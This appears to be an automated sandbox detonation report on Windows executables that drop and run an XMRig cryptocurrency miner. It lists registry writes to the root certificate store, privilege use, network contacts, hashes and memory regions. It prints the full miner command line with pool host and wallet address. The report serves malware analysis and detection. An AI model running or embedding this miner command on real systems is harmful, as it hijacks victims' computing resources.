N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
NL 23.62.61.137:443 www.bing.com tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 137.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 97.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/5012-16-0x000001C0463A0000-0x000001C0463C0000-memory.dmp

memory/5012-17-0x000001C047BA0000-0x000001C047BC0000-memory.dmp

memory/5012-18-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-21-0x000001C047BE0000-0x000001C047C00000-memory.dmp

memory/5012-19-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-20-0x000001C047BC0000-0x000001C047BE0000-memory.dmp

memory/5012-22-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-23-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-24-0x000001C047BC0000-0x000001C047BE0000-memory.dmp

memory/5012-25-0x000001C047BE0000-0x000001C047C00000-memory.dmp

memory/5012-26-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-27-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-28-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-29-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-30-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-31-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-32-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-33-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-34-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-35-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-36-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-37-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-38-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-39-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-40-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-41-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-42-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-43-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-44-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-45-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-46-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-47-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-48-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-49-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-50-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-51-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-52-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-53-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-54-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-55-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-56-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-57-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-58-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-59-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-60-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-61-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-62-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-63-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-64-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-65-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-66-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-67-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-68-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-69-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-70-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-71-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-72-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-73-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-74-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-75-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-76-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-77-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-78-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-79-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-80-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-81-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-82-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-83-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

memory/5012-84-0x00007FF6BA320000-0x00007FF6BAE23000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 21:55

Platform

win10v2004-20240508-en

Max time kernel

1793s

Max time network

1789s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
NL 23.62.61.75:443 www.bing.com tcp
US 8.8.8.8:53 75.61.62.23.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 169.253.116.51.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
NL 23.62.61.155:443 www.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 155.61.62.23.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/3964-16-0x00000248DF520000-0x00000248DF540000-memory.dmp

memory/3964-17-0x00000249718E0000-0x0000024971900000-memory.dmp

memory/3964-18-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-21-0x0000024971F30000-0x0000024971F50000-memory.dmp

memory/3964-19-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-20-0x0000024971F50000-0x0000024971F70000-memory.dmp

memory/3964-22-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-23-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-24-0x0000024971F50000-0x0000024971F70000-memory.dmp

memory/3964-25-0x0000024971F30000-0x0000024971F50000-memory.dmp

memory/3964-26-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-27-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

memory/3964-28-0x00007FF66A320000-0x00007FF66AE23000-memory.dmp

